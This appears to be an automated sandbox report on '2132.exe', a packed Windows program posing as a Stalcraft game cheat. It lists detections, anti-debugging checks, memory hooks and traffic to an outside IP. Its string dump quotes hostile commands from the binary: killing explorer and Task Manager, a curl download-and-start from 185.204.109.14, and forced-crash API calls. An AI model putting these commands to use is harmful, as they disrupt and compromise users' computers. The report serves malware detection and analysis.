Click to jump to signature section
Source: 2132.exe | ReversingLabs: Detection: 66% |
Source: 2132.exe | Virustotal: Detection: 37% | Perma Link |
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- | memstr_6fb99af9-2 |
Source: 2132.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp |
Source: | Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp |
Source: | Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp |
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 185.204.109.14:5145 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.204.109.14 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.204.109.14 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.204.109.14 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.204.109.14 |
Source: 2132.exe | String found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3 |
Source: 2132.exe | String found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3start |
Source: 2132.exe | String found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07 |
Source: 2132.exe | String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr |
Source: 2132.exe | String found in binary or memory: http://pki-ocsp.symauth.com0 |
Source: 2132.exe, 00000000.00000002.1991144735.00000279BD5C7000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zlib.net/D |
Source: 2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: https://curl.se/V |
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html |
Source: 2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/copyright.htmlD |
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html |
Source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: 2132.exe | String found in binary or memory: https://discord.gg/W2mrcAMEAH |
Source: 2132.exe | String found in binary or memory: https://discord.gg/W2mrcAMEAHChams |
Source: 2132.exe | String found in binary or memory: https://www.myinstants.com/media/sounds/skibidi-toilet.mp3 |
Source: 2132.exe | Static PE information: .vmp0 and .vmp1 section names |
Source: 2132.exe, 00000000.00000002.1991144735.00000279BD5C7000.00000002.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs 2132.exe |
Source: 2132.exe, 00000000.00000002.1991268655.00000279BD671000.00000002.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamelibcurl.dllB vs 2132.exe |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: msvcp140.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: dwmapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: d3d9.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: vcruntime140_1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: vcruntime140.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: wtsapi32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: vcruntime140.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: vcruntime140_1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: vcruntime140.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: zlib1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: libcurl.dll | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: classification engine | Classification label: mal88.evad.winEXE@2/1@0/1 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03 |
Source: C:\Users\user\Desktop\2132.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: 2132.exe | ReversingLabs: Detection: 66% |
Source: 2132.exe | Virustotal: Detection: 37% |
Source: unknown | Process created: C:\Users\user\Desktop\2132.exe "C:\Users\user\Desktop\2132.exe" |
Source: C:\Users\user\Desktop\2132.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: 2132.exe | Static PE information: Image base 0x140000000 > 0x60000000 |
Source: 2132.exe | Static file information: File size 4124160 > 1048576 |
Source: 2132.exe | Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x3df400 |
Source: 2132.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 2132.exe, 00000000.00000002.1991232979.00000279BD654000.00000002.10000000.00040000.00000000.sdmp |
Source: | Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp |
Source: | Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 2132.exe, 00000000.00000002.1991128019.00000279BD5BF000.00000002.10000000.00040000.00000000.sdmp |
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1 |
Source: 2132.exe | Static PE information: section name: .vmp0 |
Source: 2132.exe | Static PE information: section name: .vmp1 |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8A50008 value: E9 8B D7 E9 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED790 value: E9 80 28 16 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8A60008 value: E9 8B DA E8 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88EDA90 value: E9 80 25 17 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8A70008 value: E9 4B D6 E7 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED650 value: E9 C0 29 18 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8A80008 value: E9 AB D0 E6 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED0B0 value: E9 60 2F 19 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8A90008 value: E9 0B D2 E5 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED210 value: E9 00 2E 1A 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8AA0008 value: E9 0B D9 E4 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED910 value: E9 00 27 1B 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8AB0008 value: E9 CB D4 E3 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED4D0 value: E9 40 2B 1C 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8AC0008 value: E9 2B D9 E2 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED930 value: E9 E0 26 1D 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8AD0008 value: E9 0B DA E1 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88EDA10 value: E9 00 26 1E 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8AE0008 value: E9 EB D4 E0 FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED4F0 value: E9 20 2B 1F 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8AF0008 value: E9 2B D5 DF FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED530 value: E9 E0 2A 20 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8B00008 value: E9 4B D4 DE FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED450 value: E9 C0 2B 21 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8B10008 value: E9 EB D9 DD FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED9F0 value: E9 20 26 22 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8B2000D value: E9 BB CB DF FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C891CBC0 value: E9 5A 34 20 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8B30008 value: E9 CB D1 DB FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED1D0 value: E9 40 2E 24 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C8B40008 value: E9 EB D1 DA FF | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Memory written: PID: 5576 base: 7FF8C88ED1F0 value: E9 20 2E 25 00 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | RDTSC instruction interceptor: First address: 7FF7FA8584F1 second address: 7FF7FA85850E instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop ecx 0x00000004 inc ebp 0x00000005 bsf edi, esi 0x00000008 stc 0x00000009 and ah, 0000004Bh 0x0000000c pop ebp 0x0000000d inc ecx 0x0000000e test bl, 0000005Fh 0x00000011 inc ecx 0x00000012 adc bl, FFFFFF9Fh 0x00000015 inc eax 0x00000016 xor bh, 0000002Ah 0x00000019 pop esi 0x0000001a inc ecx 0x0000001b rcr ch, cl 0x0000001d rdtsc |
Source: C:\Users\user\Desktop\2132.exe | Special instruction interceptor: First address: 7FF7FAED8076 instructions rdtsc caused by: RDTSC with Trap Flag (TF) |
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: 2132.exe, 00000000.00000003.1990830948.00000279BBC2B000.00000004.00000020.00020000.00000000.sdmp, 2132.exe, 00000000.00000002.1991037855.00000279BBC2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: C:\Users\user\Desktop\2132.exe | System information queried: ModuleInformation | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Process information queried: ProcessInformation | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Thread information set: HideFromDebugger | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Handle closed: DEADC0DE |
Source: C:\Users\user\Desktop\2132.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | Process queried: DebugObjectHandle | Jump to behavior |
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\2132.exe | NtQueryVolumeInformationFile: Indirect: 0x7FF7FAAF4786 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | NtCreateFile: Indirect: 0x7FF7FAAF4677 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | NtProtectVirtualMemory: Indirect: 0x7FF7FAAF24BE | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | NtMapViewOfSection: Indirect: 0x7FF7FAAF49CE | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | NtQueryAttributesFile: Indirect: 0x7FF7FAAF4618 | Jump to behavior |
Source: C:\Users\user\Desktop\2132.exe | NtOpenFile: Indirect: 0x7FF7FAAF46E2 | Jump to behavior |
Source: 2132.exe | Binary or memory string: Shell_TrayWnd |
Source: 2132.exe | Binary or memory string: than 10.00 aim could work incorrect!%dmsWorldXRay Status:waitWarning!PreviewOther##crossSpeedRainbowstalcraft.exestalcraftw.exeGame executableInfobibadaysbober.su Discordhttps://discord.gg/W2mrcAMEAHChams loadingABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789RtlAdjustPrivilegentdll.dllNtRaiseHardError Y: X: C:\Windows\Fonts\Arial.ttftemp.buf > \/taskkill /IM explorer.exe /Ftaskkill /IM taskmgr.exe /F\ballincasin.mp3curl -o ballincasin.mp3 http://185.204.109.14:4777/ballincasin.mp3start ballincasin.mp3"del "Shell_TrayWnd.bmpFailed to initialize WinsockFailed to create socket185.204.109.14Failed to connect to serverFailedCheck your internet connection!rwid;;explorer.execurl -o skibidi.mp3 https://www.myinstants.com/media/sounds/skibidi-toilet.mp3\skibidi.mp3bimba |
Source: C:\Users\user\Desktop\2132.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |